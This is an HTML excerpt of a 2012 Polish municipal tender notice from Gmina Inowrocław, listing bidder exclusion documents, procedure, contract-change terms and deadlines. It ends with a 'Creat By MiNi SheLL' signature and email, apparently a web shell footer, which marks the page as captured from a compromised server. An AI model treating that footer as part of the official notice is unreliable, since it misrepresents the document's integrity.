<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- oświadczenie - Ustawa Pzp art. 22 ust 1 oraz art. 25 ust. 1 pkt 2 - załącznik nr 2a
- oświadczenie - Ustawa Pzp art. 24 ust 1 (brak podstaw do wykluczenia) - załącznik nr 2b
- oświadczenie - Ustawa Pzp art. 24 ust 1 pkt 2 (nierozpoczęciu likwidacji i upadłości firmy) - załącznik nr 2c
- oświadczenie o zapoznaniu się ze Specyfikacją Istotnych Warunków Zamówienia oraz przeprowadzeniu wizji na   terenie omawianego zakresu robót - załącznik nr 7</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie pod rygorem nieważności.
2.	Niedopuszczalna jest zmiana postanowień zawartej umowy oraz wprowadzanie do umowy postanowień niekorzystnych dla Zamawiającego.

3.	Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy w formie 
	pisemnego aneksu na następujących warunkach:
a)	jeżeli Zamawiający dokonał zmiany sposobu wykonania części przedmiotu umowy, czego nie można było przewidzieć przed zawarciem umowy,
b)	jeżeli warunki atmosferyczne nie pozwolą na wykonywanie części przedmiotu umowy ze względów technologicznych, co może mieć wpływ na jakość wykonania, trwałość i zachowanie okresu gwarancji lub wystąpią uzasadnione przypadki nieprzewidzianych warunków realizacji przedmiotu umowy,
c)		jeżeli zmianie ulegnie urzędowa stawka VAT,
d) 		na skutek siły wyższej zajdzie konieczność zmiany terminu wykonania 
		zamówienia.

4. 	Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powstałych okoliczności w formie opisowej i właściwie umotywowanej (protokół wraz z uzasadnieniem) przez powołaną przez Zamawiającego komisję techniczną, w składzie której będą m.in. przedstawiciel Zamawiającego. 
5. 	Wykonawca będzie upoważniony do żądania przedłużenia terminu zakończenia przedmiotu umowy o okres powstały w wyniku przedłużonego postępowania o zamówienie publiczne. Okres, o jaki może wnioskować wykonawca należy liczyć od daty ustalonego pierwotnie terminu składania ofert powiększonego o siedem dni do dnia zawarcia umowy z wybranym Wykonawcą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.inowroclaw.ug.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Inowrocławiu ul. Królowej Jadwigi 43, 88-100 Inowrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.11.2012 godzina 10:00, miejsce: Urząd Gminy w Inowrocławiu, ul. Królowej Jadwigi 43, 88-100 Inowrocław, Sekretariat - pok. nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com